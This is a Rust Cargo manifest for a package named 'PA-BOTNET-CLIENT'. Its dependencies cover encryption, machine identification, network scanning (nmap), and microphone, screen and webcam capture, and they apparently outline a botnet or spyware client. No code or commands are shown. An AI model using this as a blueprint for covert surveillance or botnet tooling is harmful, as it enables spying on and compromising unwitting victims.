[package]
name = "PA-BOTNET-CLIENT"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
ipnetwork = "0.20.0"
regex = "1.4"

serde_json = "1.0.111"
object = { version = "0.32.2", features = [] }
serde = { version = "1.0.194", features = ["derive"] }
openssl = { version = "0.10", features = ["vendored"] }

aes = { version = "0.8.3", features = [] }
cbc = "0.1.2"
block-modes = "0.9.1"
hex-literal = "0.4.1"
hex = "0.4.3"
base64 = { version = "0.21.7", features = [] }
generic-array = "0.14.7"
machine-uid = "0.5.1"
typenum = "1.17.0"
cpal = "0.15.2"
hound = "3.5.1"
write = "0.1.0"
config = "0.13.4"
rodio = "0.17.3"

arc = "0.0.1"
mutex = "0.1.0"
nmap = "0.1.3"
scrap = "0.5.0"
image = "0.24.8"
camera_capture = "0.5.0"

